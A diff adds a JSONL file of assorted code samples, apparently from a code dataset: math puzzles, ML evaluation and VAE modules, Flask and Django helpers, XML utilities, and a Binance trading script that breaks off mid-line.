diff --git "a/6532.jsonl" "b/6532.jsonl" new file mode 100644--- /dev/null +++ "b/6532.jsonl" @@ -0,0 +1,648 @@ +{"seq_id":"286736334","text":"def factorial(n):\r\n fact = 1\r\n for i in range(2, n+1):\r\n fact *= i\r\n return fact\r\n\r\n\r\ndef main():\r\n cur_nums = []\r\n for i in range(3, 100000):\r\n broken_num = [int(j) for j in str(i)]\r\n sum_fact = sum([factorial(j) for j in broken_num])\r\n if sum_fact == i:\r\n cur_nums.append(i)\r\n print(cur_nums)\r\n print(sum(cur_nums))\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"PE34.py","file_name":"PE34.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570900114","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# Author: Gusseppe Bravo \n# License: BSD 3 clause\n\"\"\"\nThis module provides ideas for evaluating some machine learning algorithms.\n\n\"\"\"\nfrom __future__ import print_function\nimport operator\nimport warnings\nimport pickle\n\nimport numpy as np\nimport pandas as pd\n#import matplotlib.pyplot as plt\n# import plotly.plotly as py\nimport plotly.graph_objs as go\nimport cufflinks as cf # Needed\n#sklearn warning\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\n\nfrom collections import OrderedDict\nfrom plotly.offline.offline import _plot_html\n\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import StratifiedShuffleSplit\nfrom sklearn.model_selection import KFold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.preprocessing import FunctionTransformer\n\n#Algorithms\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\nfrom sklearn.neural_network import MLPClassifier\n\n#Ensembles algorithms\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import VotingClassifier\n\n\nclass Evaluate():\n \"\"\" A class for resampling and evaluation \"\"\"\n\n\n\n def __init__(self, definer, preparer, selector):\n self.definer = definer\n self.preparer = preparer\n self.selector = selector\n self.plot_html = None\n\n self.report = None\n self.raw_report = None\n self.best_pipelines = None\n self.pipelines = None\n self.X_train = None\n self.y_train = None\n self.X_test = None\n self.y_test = None\n\n self.test_size = 0.2\n self.num_folds = 10\n self.seed = 7\n\n def pipeline(self):\n\n #evaluators = []\n self.build_pipelines()\n self.split_data(self.test_size, self.seed)\n self.evaluate_pipelines()\n self.set_best_pipelines()\n\n #[m() for m in evaluators]\n return self\n\n def set_models(self):\n\n rs = 1\n models = []\n # LDA : Warning(Variables are collinear)\n models.append(('LinearDiscriminantAnalysis', LinearDiscriminantAnalysis()))\n models.append(('SVC', SVC(random_state=rs)))\n models.append(('GaussianNB', GaussianNB()))\n models.append(('MLPClassifier', MLPClassifier()))\n models.append(('KNeighborsClassifier', KNeighborsClassifier()))\n models.append(('DecisionTreeClassifier', DecisionTreeClassifier(random_state=rs)))\n models.append(('LogisticRegression', LogisticRegression()))\n\n # Bagging and Boosting\n # models.append(('ExtraTreesClassifier', ExtraTreesClassifier(n_estimators=150)))\n models.append(('ExtraTreesClassifier', ExtraTreesClassifier(random_state=rs)))\n models.append(('AdaBoostClassifier', AdaBoostClassifier(DecisionTreeClassifier(random_state=rs),\n random_state=rs)))\n # models.append(('AdaBoostClassifier', AdaBoostClassifier(DecisionTreeClassifier())))\n models.append(('RandomForestClassifier', RandomForestClassifier(random_state=rs)))\n models.append(('GradientBoostingClassifier',\n GradientBoostingClassifier(random_state=rs)))\n # models.append(('GradientBoostingClassifier', GradientBoostingClassifier()))\n\n # Voting\n estimators = []\n estimators.append((\"Voting_GradientBoostingClassifier\", GradientBoostingClassifier(random_state=rs)))\n estimators.append((\"Voting_ExtraTreesClassifier\", ExtraTreesClassifier(random_state=rs)))\n voting = VotingClassifier(estimators)\n models.append(('VotingClassifier', voting))\n\n return models\n\n def split_data(self, test_size=0.20, seed=7):\n \"\"\" Need to fill \"\"\"\n\n X_train, X_test, y_train, y_test = train_test_split(\n self.definer.X, self.definer.y, test_size=test_size, random_state=seed)\n\n self.X_train = X_train\n self.X_test = X_test\n self.y_train = y_train\n self.y_test = y_test\n\n # return X_train, X_test, y_train, y_test\n\n\n def build_pipelines(self):\n pipelines = []\n models = self.set_models()\n\n for m in models:\n pipelines.append((m[0],\n Pipeline([\n #('preparer', FunctionTransformer(self.preparer)),\n ('preparer', self.preparer),\n ('selector', self.selector),\n m,\n ])\n ))\n\n self.pipelines = pipelines\n\n return pipelines\n\n def evaluate_pipelines(self, ax=None):\n\n test_size = self.test_size\n num_folds = self.num_folds\n seed = self.seed\n scoring = 'accuracy'\n\n #pipelines = self.build_pipelines(self.set_models())\n #pipelines = self.pipelines\n\n\n #self.report = {}\n #report_element = {}\n self.report = [[\"Model\", \"Mean\", \"STD\"]]\n results = []\n names = []\n\n for name, model in self.pipelines:\n print(\"Modeling...\", name)\n\n kfold = KFold(n_splits=num_folds, random_state=seed)\n #cv_results = cross_val_score(model, self.definer.data.ix[:,:-1], self.definer.data.ix[:,-1], cv=kfold, \\\n #scoring=scoring)\n cv_results = cross_val_score(model, self.X_train, self.y_train, cv=kfold, \\\n scoring=scoring)\n\n # save the model to disk\n #filename = name+'.ml'\n #pickle.dump(model, open('./models/'+filename, 'wb'))\n\n #results.append(cv_results)\n mean = cv_results.mean()\n std = cv_results.std()\n\n d = {'name': name, 'values': cv_results, 'mean': round(mean, 3), 'std': round(std, 3)}\n results.append(d)\n #results['result'] = cv_results\n #names.append(name)\n #report_element[name] = {'mean':mean, 'std':std}\n #self.report.update(report_element)\n\n #report_print = \"Model: {}, mean: {}, std: {}\".format(name,\n #mean, std)\n self.report.append([name, round(mean,3), round(std,3)])\n print(\"Score \", mean)\n print(\"---------------------\")\n #print(report_print)\n\n self.raw_report = sorted(results, key=lambda k: k['mean'], reverse=True)\n #print(self.raw_report)\n headers = self.report.pop(0)\n df_report = pd.DataFrame(self.report, columns=headers)\n #print(df_report)\n\n #print(self.report)\n #self.sort_report(self.report)\n self.sort_report(df_report)\n #self.plotModels(results, names)\n\n\n def sort_report(self, report):\n \"\"\"\" Choose the best two algorithms\"\"\"\n\n #sorted_t = sorted(report.items(), key=operator.itemgetter(1))\n report.sort_values(['Mean'], ascending=[False], inplace=True)\n #self.bestAlgorithms = sorted_t[-2:]\n self.report = report.copy()\n\n #print(self.report)\n\n def set_best_pipelines(self):\n alg = list(self.report.Model)[0:2]\n best_pipelines = []\n\n for p in self.pipelines:\n if p[0] in alg:\n best_pipelines.append(p)\n\n self.best_pipelines = best_pipelines\n\n #print(self.best_pipelines)\n\n def plot_to_html(self, fig):\n plotly_html_div, plotdivid, width, height = _plot_html(\n figure_or_data=fig,\n config=\"\",\n validate=True,\n default_width='90%',\n default_height=\"100%\",\n global_requirejs=False)\n\n return plotly_html_div\n\n def plot_models(self):\n \"\"\"\" Plot the algorithms by using box plots\"\"\"\n #df = pd.DataFrame.from_dict(self.raw_report)\n #print(df)\n\n results = self.raw_report\n data = []\n N = len(results)\n c = ['hsl('+str(h)+',50%'+',50%)' for h in np.linspace(0, 270, N)]\n\n for i, d in enumerate(results):\n trace = go.Box(\n y=d['values'],\n name=d['name'],\n marker=dict(\n color=c[i],\n ),\n boxmean='sd'\n )\n data.append(trace)\n\n text_scatter = go.Scatter(\n x=[d['name'] for d in results],\n y=[d['mean'] for d in results],\n name='score',\n mode='markers',\n text=['Explanation' for _ in results]\n )\n data.append(text_scatter)\n layout = go.Layout(\n #showlegend=False,\n title='Hover over the bars to see the details',\n annotations=[\n dict(\n x=results[0]['name'],\n y=results[0]['mean'],\n xref='x',\n yref='y',\n text='Best model',\n showarrow=True,\n arrowhead=7,\n ax=0,\n ay=-40\n ),\n dict(\n x=results[-1]['name'],\n y=results[-1]['mean'],\n xref='x',\n yref='y',\n text='Worst model',\n showarrow=True,\n arrowhead=7,\n ax=0,\n ay=-40\n )\n ]\n )\n\n fig = go.Figure(data=data, layout=layout)\n\n self.plot_html = self.plot_to_html(fig)\n return self.plot_html\n\n def save_plot(self, path):\n with open(path, \"w\") as plot:\n plot.write(self.plot_html)\n\n def save_report(self, path):\n # with open(path, \"w\") as plot:\n self.report.to_csv(path, index=False)\n # plot.write(valuate.report.to_csv())\n\n class CustomFeature(TransformerMixin):\n \"\"\" A custome class for modeling \"\"\"\n\n def transform(self, X, **transform_params):\n #X = pd.DataFrame(X)\n return X\n\n def fit(self, X, y=None, **fit_params):\n return self\n","sub_path":"pymach/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":10520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"35766146","text":"from py_hcl.core.expr import HclExpr\nfrom py_hcl.core.type.vector import VectorT\n\n\nclass VecHolder(HclExpr):\n def __init__(self, hcl_type, conn_side, assoc_value):\n self.hcl_type = hcl_type\n self.conn_side = conn_side\n\n assert isinstance(hcl_type, VectorT)\n assert hcl_type.size == len(assoc_value)\n self.assoc_value = assoc_value\n","sub_path":"py_hcl/core/expr/vec_holder.py","file_name":"vec_holder.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"430309593","text":"# Implement atoi which converts a string to an integer.\n#\n# Input: \" -42\"\n# Output: -42\n# Explanation: The first non-whitespace character is '-', which is the minus sign.\n# Then take as many numerical digits as possible, which gets 42.\n\nimport re\nclass Solution:\n # @return an integer\n def myAtoi(self, str):\n str = str.strip(' ') # 移除字符串头尾指定的字符\n print(str)\n str = re.findall('(^[\\+\\-0]*\\d+)\\D*', str)\n\n try:\n result = int(''.join(str))\n MAX_INT = 2147483647\n MIN_INT = -2147483648\n if result > MAX_INT > 0:\n return MAX_INT\n elif result < MIN_INT < 0:\n return MIN_INT\n else:\n return result\n except:\n return 0\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n test = Solution()\n str = \" dfda 12\" # expected 0\n a = test.myAtoi(str)\n print(a)","sub_path":"python/Day6/atoi.py","file_name":"atoi.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"630543415","text":"import jwt\nfrom core.models import User\nfrom django.conf import settings\nfrom rest_framework import authentication, exceptions\nfrom django.http.response import JsonResponse\nfrom rest_framework import status\n\nclass JWTAuthentication():\n @staticmethod\n def generate_access_token(userId):\n jwt_token = jwt.encode(\n {'id': userId}, settings.JWT_SECRET_KEY,settings.JWT_ALGORITHM)\n access_token = jwt_token.decode('utf-8')\n return access_token\n\n @staticmethod\n def isAdmin(userId):\n isAdmin_ = False\n user_info = User.objects.filter(role__name='admin',id = userId)\n if user_info:\n isAdmin_ = True\n return isAdmin_\n\n @staticmethod\n def validate_token(request):\n access_token = request.headers.get('authorization',None)\n if access_token:\n try:\n payload = jwt.decode(access_token, settings.JWT_SECRET_KEY, settings.JWT_ALGORITHM)\n user = User.objects.get(id = payload.get('id'))\n return user\n\n except jwt.DecodeError as identifier:\n raise exceptions.AuthenticationFailed(\n 'Your token is invalid')\n except jwt.ExpiredSignatureError as identifier:\n raise exceptions.AuthenticationFailed(\n 'Your token is expired')\n else:\n raise exceptions.AuthenticationFailed('Authorization Header missing')","sub_path":"backend/core/authentications.py","file_name":"authentications.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"112740184","text":"import unittest\n\nfrom flask import url_for\n\nfrom config import create_app, db\n\n\nclass APITestCase(unittest.TestCase):\n def setUp(self):\n self.app = create_app('testing')\n self.app_context = self.app.app_context()\n self.app_context.push()\n db.create_all()\n self.client = self.app.test_client()\n\n def tearDown(self):\n db.session.remove()\n db.drop_all()\n self.app_context.pop()\n\n def get_api_headers(self):\n return {\n 'Accept': 'application/json',\n 'Content-Type': 'application/json'\n }\n\n def test_user_path(self):\n response = self.client.get('/user')\n self.assertEqual(response.json['code'], 10200)\n\n def test_status_path(self):\n response = self.client.get('/status/')\n self.assertEqual(response.json['code'], 10200)\n ","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"157422616","text":"DEFAULT_IP_ADDRESS = '127.0.0.1'\nDEFAULT_PORT = 7777\nMAX_CONNECTIONS = 3\nENCODING = 'utf-8'\nMAX_PACKAGE_LENGTH = 1024\n\n# JIM поля\nACTION = 'action'\nTIME = 'time'\nUSER = 'user'\nACCOUNT_NAME = 'account_name'\nRESPONSE = 'response'\nERROR = 'error'\nALERT = 'alert' # текст сообщения ошибки\nROOM = 'room' # чат\n\n# значения action\nPRESENCE = 'presence' # при подключении к серверу клиента\nPROBE = 'probe' # доступность пользователя online\nQUIT = 'quit' # выход\nAUTHENTICATE = 'authenticate' # авторизация\nMESSAGE = 'msg'\nJOIN = 'join' # присоединиться к чату\nLEAVE = 'leave' # покинуть чать\n\n# code\nBASIC_NOTICE = 100\nOK = 200\nCREATED = 201 # объект создан\nACCEPTED = 202 # подтверждение\nSERVER_ERROR = 500\nWRONG_REQUEST = 400 # неправильный запрос\n\n","sub_path":"HW_3_Afanaseva_Maria/common/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"612346873","text":"from flask import Flask\n\nimport kangce.user\nimport kangce.schema\n\napp = Flask(__name__)\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\n\nisdebug = True\n\nbaseUri = \"http://dev.7csc.com\"\npvBaseUri = \"{}/pv\".format(baseUri)\ncompanyId = \"95f05fe5621f4f299771759758ab7fb0\"\n\n@app.route('/icsr/schema')\ndef get_schema(baseUri):\n login_response = kangce.user.login(baseUri, isdebug)\n kangce.schema.clean_redis(pvBaseUri, login_response, companyId)\n kangce.schema.get_schema(pvBaseUri, login_response)\n kangce.schema.get_schema4add(pvBaseUri, login_response)\n\n\nif __name__ == \"__main__\":\n if isdebug:\n baseUri = \"http://127.0.0.1:8082\"\n pvBaseUri = \"{}\".format(baseUri)\n get_schema(baseUri)","sub_path":"mickeyFlask/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"483099977","text":"from app.classification_module.prepare_ratio import get_model_ratio\r\nfrom app.classification_module.numpy_proceed import preprocess_array\r\nfrom app.doc2vec_module.train_model import get_model_for_genre\r\nfrom app.doc2vec_module.constants import FileConstants\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom gensim.models import Doc2Vec\r\nfrom app.doc2vec_module import load\r\nfrom pathlib import Path\r\nimport numpy as np\r\n\r\n\r\n# Пример работы для отдельных книг\r\nclf = MLPClassifier(solver='lbfgs', alpha=1e-5,\r\n hidden_layer_sizes=(15, 6), random_state=1)\r\n\r\n\r\n#path_to_check1 = Path(__file__).parents[1].joinpath('books/test_book/Дети Капитана Гранта.txt')\r\n#documents1 = load.get_doc_from_file(str(path_to_check1))\r\n\r\npath_to_check1 = Path(__file__).parents[1].joinpath('books/test_book/Гарри Поттер и Дары Смерти.txt')\r\ndocuments1 = load.get_doc_from_file(str(path_to_check1))\r\n\r\nprint(\"Получаем модель для книги\")\r\nprint(\"\")\r\ncheck_model1 = get_model_for_genre([documents1])\r\n#check_model2 = get_model_for_genre([documents2])\r\n\r\nprint(\"Начинаем подгружать модели по жанрам\")\r\nprint(\" \")\r\n\r\nprop_list = [\"MODEL_ADVENTURE\", \"MODEL_ART\", \"MODEL_DETECTIVE\", \"MODEL_FANTASTIC\", \"MODEL_FANTASY\", \"MODEL_LOVE\"]\r\ngenre_labels = ['приключения', 'искусство', 'детектив', 'фантастика', 'фэнтези', 'любовь']\r\ntrain_list = []\r\n\r\nfor item in prop_list:\r\n print(\"Модель: {0}\".format(item))\r\n model_prop = getattr(FileConstants, item)\r\n model = Doc2Vec.load(model_prop.fget(FileConstants()))\r\n train = preprocess_array(get_model_ratio(model))\r\n train_list.append(train)\r\n print(\" \")\r\n\r\ncheck_train1 = preprocess_array(np.array(check_model1.docvecs[str(0)]))\r\nnp_train_list = np.asarray(train_list)\r\n\r\ncounter = 0\r\ncounter1 = 0\r\n\r\nlabels = []\r\n\r\nfor i in range(1, 7):\r\n a = np.empty(6)\r\n a.fill(i)\r\n labels.append(a)\r\n\r\nlabels = np.asarray(labels)\r\nprint(np_train_list)\r\nprint(\"======================\")\r\nprint(labels)\r\n\r\nclf.fit(np_train_list, [1, 2, 3, 4, 5, 6])\r\n\r\ntest = []\r\n\r\nfor i in range(6):\r\n test.append(np.random.randint(200, size = 20))\r\n\r\ntest = np.asarray(test)\r\n\r\nfor i in range(6):\r\n print(\"Расчёт для жанра \\\"{0}\\\"\".format(genre_labels[counter]))\r\n check = test.copy()\r\n check[counter] = check_train1\r\n print(clf.predict(check))\r\n\r\n counter +=1\r\n","sub_path":"app/classification_module/classificate.py","file_name":"classificate.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"441329949","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nfrom helpers import test_clfs, load_data,get_baseline, print_results, _naive_predictor\n\ndef get_predictor_of_wrong_predictions(clf):\n target_name = \"wrong_pred\" \n naive_predictor, df = _naive_predictor()\n \n df['B365_pred']=naive_predictor\n df[target_name]=df['FTR']!=df['B365_pred']\n df.drop(inplace=True,labels=['FTR'],axis=1)\n \n target=df[target_name]\n df = pd.get_dummies(df)\n X=df.drop(target_name,axis=1)\n df.head()\n res=test_clfs(clfs=[clf],X=X,target=target,cv=10)\n \n models =[]\n for k in res.keys():\n models.append(k)\n return models[0], X, target\n\n \ndef get_predictor_on_wrong(clf):\n target_name = \"FTR\"\n naive_predictor, df = _naive_predictor() \n \n df['B365_pred']=naive_predictor\n df_incorrect=df[df['FTR']!=df['B365_pred']]\n # df_incorrect.drop(inplace=True,labels=['HomeTeam', 'AwayTeam', 'FTHG', 'FTAG', 'HTHG', 'HTAG', 'HTR', 'Referee', 'HS', \n # 'AS', 'HST', 'AST', 'HF', 'AF', 'HC', 'AC', 'HY', 'AY', 'HR', 'AR', 'B365H', 'B365D', 'B365A', 'BWH', 'BWD', 'BWA', 'IWH', \n # 'IWD', 'IWA', 'LBH', 'LBD', 'LBA', 'PSH', 'PSD', 'PSA', 'WHH', 'WHD', 'WHA', 'VCH', 'VCD', 'VCA', 'Bb1X2', 'BbMxH', 'BbAvH', \n # 'BbMxD', 'BbAvD', 'BbMxA', 'BbAvA', 'BbOU', 'BbMx>2.5', 'BbAv>2.5', 'BbMx<2.5', 'BbAv<2.5', 'BbAH', 'BbAHh', 'BbMxAHH', \n # 'BbAvAHH', 'BbMxAHA', 'BbAvAHA', 'PSCH', 'PSCD', 'PSCA',\n # 'home_team_goals_for', 'home_team_goals_against', \n # 'home_team_corners_for', 'home_team_corners_against', 'home_team_shotson_for', 'home_team_shotson_against', \n # 'home_team_shotsoff_for', 'home_team_shotsoff_against', 'away_team_goals_for', 'away_team_goals_against', \n # 'away_team_corners_for', 'away_team_corners_against', 'away_team_shotson_for', 'away_team_shotson_against', \n # 'away_team_shotsoff_for', 'away_team_shotsoff_against'],axis=1)\n\n target=df_incorrect[target_name]\n \n df_incorrect=df_incorrect.drop(labels=target_name,axis=1)\n X = pd.get_dummies(df_incorrect)\n\n res=test_clfs(clfs=[clf],X=X,target=target,cv=10)\n \n models =[]\n for k in res.keys():\n models.append(k)\n return models[0], X, target","sub_path":"DataScience/DataAnalysisFootball/stacked_models_helper.py","file_name":"stacked_models_helper.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"220834371","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/7/7 16:18\n# @Author : FrankLiu\n# @Contact : liufft98@gmail.com\n# @File : xmv_to_csv.py\n# @Software: PyCharm\n\n\nimport os\nimport glob\nimport pandas as pd\nimport xml.etree.ElementTree as ET\n\nos.chdir('D:\\\\Tensorflow\\\\models\\\\research\\\\object_detection\\\\catdog\\\\test')\npath = 'D:\\\\Tensorflow\\\\models\\\\research\\\\object_detection\\\\catdog\\\\test'\n\n\ndef xml_to_csv(path):\n xml_list = []\n for xml_file in glob.glob(path + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for member in root.findall('object'):\n value = (root.find('filename').text,\n int(root.find('size')[0].text),\n int(root.find('size')[1].text),\n member[0].text,\n int(member[4][0].text),\n int(member[4][1].text),\n int(member[4][2].text),\n int(member[4][3].text),\n )\n xml_list.append(value)\n column_name = ['filename','width','height','class','xmin','ymin','xmax','ymax']\n xml_df = pd.DataFrame(xml_list,columns=column_name)\n # print(xml_df)\n return xml_df\n\ndef main():\n image_path = path\n xml_df = xml_to_csv(image_path)\n xml_df.to_csv('catdog_test.csv',index=None)\n print(\"successed convert!\")\n\n\nmain()\n","sub_path":"xmv_to_csv.py","file_name":"xmv_to_csv.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570125869","text":"#!/usr/bin/env python\n\n'''Create a print a new XML document'''\n\nHAS_LXML = False\n\ntry:\n import lxml.etree as ET\n HAS_LXML = True\nexcept ImportError:\n import xml.etree.ElementTree as ET\n \ndef main():\n '''Program entry point'''\n root = build_tree()\n doc = ET.ElementTree(root)\n print_doc(root)\n write_doc(doc)\n\ndef build_tree():\n '''Build the new XML document'''\n root = ET.Element('movies')\n \n for movie in ('Superman Returns', 'This is Spinal Tap'):\n movie_element = ET.Element('movie')\n movie_element.text = movie\n root.append(movie_element)\n \n movie = ET.Element('movie', director='Spielberg, Stephen')\n root.append(movie)\n movie.text = 'Jaws'\n \n movie = ET.Element('movie', director='Hitchcock, Alfred')\n movie.text = 'Vertigo'\n actor1 = ET.Element('actor')\n actor1.text = 'James Stewart'\n movie.append(actor1)\n actor2 = ET.Element('actor')\n actor2.text = 'Kim Novak'\n movie.append(actor2)\n root.append(movie)\n \n movie3 = ET.Element('movie', director='Welles, Orson')\n movie3.text = 'Citizen Kane'\n root.append(movie3)\n\n return root\n\ndef print_doc(root):\n '''Print out the XML document, pretty-printing if available'''\n if HAS_LXML:\n print(ET.tostring(root, pretty_print=True).decode())\n else:\n print(ET.tostring(root).decode())\n\ndef write_doc(doc):\n '''Write the XML document out to a file, pretty-printing if available'''\n if HAS_LXML:\n doc.write('movies.xml', pretty_print=True)\n else:\n doc.write('movies.xml')\n\nmain()\n","sub_path":"EXAMPLES/xml_create_movies.py","file_name":"xml_create_movies.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"106346018","text":"from typing import Dict, Optional, Tuple\n\nimport torch\nfrom torch import Tensor, nn\nfrom torch.nn import functional as F\n\n\nclass BaseSequentialVAE(nn.Module):\n \"\"\"Base class for sequential model.\"\"\"\n\n def forward(self, x: Tensor, time_steps: int = 0) -> Tensor:\n \"\"\"Forwards to reconstruct given data.\n\n Args:\n x (torch.Tensor): Observation tensor, size `(b, l, c, h, w)`.\n time_steps (int, optional): Time step for prediction.\n\n Returns:\n recon (torch.Tensor): Reconstructed observations.\n \"\"\"\n\n recon, *_ = self.sample(x, time_steps)\n\n return recon\n\n def loss_func(\n self, x: Tensor, mask: Optional[Tensor] = None, beta: float = 1.0\n ) -> Dict[str, Tensor]:\n \"\"\"Loss function.\n\n Args:\n x (torch.Tensor): Observation tensor, size `(b, l, c, h, w)`.\n mask (torch.Tensor, optional): Sequence mask for valid data with binary values, size\n `(b, l)`.\n beta (float, optional): Beta coefficient of KL term.\n\n Returns:\n loss_dict (dict of [str, torch.Tensor]): Dict of lossses.\n \"\"\"\n\n raise NotImplementedError\n\n def sample(\n self, x: Optional[Tensor] = None, time_steps: int = 0, batch_size: int = 1\n ) -> Tuple[Tensor, ...]:\n \"\"\"Reconstructs and samples observations.\n\n Args:\n x (torch.Tensor, optional): Observation tensor, size `(b, l, c, h, w)`.\n time_steps (int, optional): Time step for prediction.\n batch_size (int, optional): Batch size for samping, used if `x` is `None`.\n\n Returns:\n samples (tuple of torch.Tensor): Tuple of reconstructed or sampled data. The first\n element should be reconstructed observations.\n\n Raises:\n ValueError: If `x` is `None` and `time_steps` is non positive.\n \"\"\"\n\n raise NotImplementedError\n\n\ndef kl_divergence_normal(\n mu0: Tensor, var0: Tensor, mu1: Tensor, var1: Tensor, reduce: bool = True\n) -> Tensor:\n \"\"\"Kullback Leibler divergence for 1-D Normal distributions.\n\n p = N(mu0, var0)\n q = N(mu1, var1)\n KL(p||q) = 1/2 * (var0/var1 + (mu1-mu0)^2/var1 - 1 + log(var1/var0))\n\n Args:\n mu0 (torch.Tensor): Mean vector of p, size.\n var0 (torch.Tensor): Diagonal variance of p.\n mu1 (torch.Tensor): Mean vector of q.\n var1 (torch.Tensor): Diagonal variance of q.\n reduce (bool, optional): If `True`, sum calculated loss for each data point.\n\n Returns:\n kl (torch.Tensor): Calculated kl divergence for each data.\n \"\"\"\n\n diff = mu1 - mu0\n kl = (var0 / var1 + diff ** 2 / var1 - 1 + (var1 / var0).log()) * 0.5\n\n if reduce:\n return kl.sum(-1)\n return kl\n\n\ndef nll_bernoulli(x: Tensor, probs: Tensor, reduce: bool = True) -> Tensor:\n \"\"\"Negative log likelihood for Bernoulli distribution.\n\n Ref)\n https://pytorch.org/docs/stable/_modules/torch/distributions/bernoulli.html#Bernoulli\n https://github.com/pytorch/pytorch/blob/master/torch/distributions/utils.py#L75\n\n Args:\n x (torch.Tensor): Inputs tensor, size `(*, dim)`.\n probs (torch.Tensor): Probability parameter, size `(*, dim)`.\n reduce (bool, optional): If `True`, sum calculated loss for each data point.\n\n Returns:\n nll (torch.Tensor): Calculated nll for each data, size `(*,)` if `reduce` is `True`,\n `(*, dim)` otherwise.\n \"\"\"\n\n probs = probs.clamp(min=1e-6, max=1 - 1e-6)\n logits = torch.log(probs) - torch.log1p(-probs)\n nll = F.binary_cross_entropy_with_logits(logits, x, reduction=\"none\")\n\n if reduce:\n return nll.sum(-1)\n return nll\n","sub_path":"seqlib/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"347936132","text":"# CLASS METHOD EXAMPLES\n# GET NO OF OBJECTES CREATED FOR A CLASS\n\nclass Test:\n count = 0 # Static Variable\n def __init__(self):\n Test.count = Test.count + 1 # To access static variable inside constructor\n @classmethod\n def getNoOfObjects(cls):\n print('NO OF OBJS FOR GIVEN CLASS :',cls.count) # Test.count\n\nTest.getNoOfObjects() # 0\nt1 = Test() # Obj Created, Constructor executed automatically\nt2 = Test() # Obj Created, Constructor executed automatically\nt2 = Test()\nt2 = Test()\nTest.getNoOfObjects() # 4\n\n \n\n","sub_path":"02-OOPs/25-noOfObjects.py","file_name":"25-noOfObjects.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"469562761","text":"#!/usr/bin/env python3\n\nimport math \nimport click\nfrom client import get_client\nfrom binance.exceptions import BinanceAPIException, BinanceOrderException \n\nclient = get_client() \n\n@click.command() \n@click.argument('side') \n@click.argument('order_type') \n@click.argument('symbol') \n@click.option('--test','-t', default=False, is_flag=True) \n@click.option('--percentage', '-p', default=1, type=float) \n@click.option('--mrk_per', '-m', default=0, type=float) \n\ndef make_order(side, order_type, symbol, test, percentage, mrk_per):\n \n if symbol.endswith('USDT'): \n asset = symbol[:-4]\n base = 'USDT' \n else: # BTC or BNB \n asset = symbol[:-3]\n base = symbol[-3:]\n \n asset_balance = client.get_asset_balance(asset=asset) \n base_balance = client.get_asset_balance(asset=base) \n current_price = client.get_symbol_ticker(symbol=symbol)\n \n print(asset_balance) \n print(base_balance) \n print(current_price)\n \n price = float(current_price['price']) * ( 1 + float(mrk_per) ) \n \n if side=='BUY':\n quantity = float(base_balance['free']) * float(percentage)/float(price)*0.9995\n else:\n quantity = float(asset_balance['free']) * float(percentage)*0.9995 \n \n filters = client.get_symbol_info(symbol)['filters']\n tick_size = float( list(filter(lambda dum: dum['filterType'] == 'PRICE_FILTER', filters))[0]['tickSize'] )\n step_size = float( list(filter(lambda dum: dum['filterType'] == 'LOT_SIZE', filters))[0]['stepSize'] )\n \n def float_precision(f, n): \n n = int(math.log10(1 / float(n)))\n f = math.floor(float(f) * 10 ** n) / 10 ** n\n f = \"{:0.0{}f}\".format(float(f), n)\n return str(int(f)) if int(n) == 0 else f\n \n quantity = float( float_precision(quantity, step_size) ) \n price = float_precision(price, tick_size) \n \n try:\n if test: \n print('test order:', side, order_type, 'symbol', symbol, 'price', price, 'quantity', quantity, 'cost', float(price)*quantity) \n if order_type == 'MARKET': \n 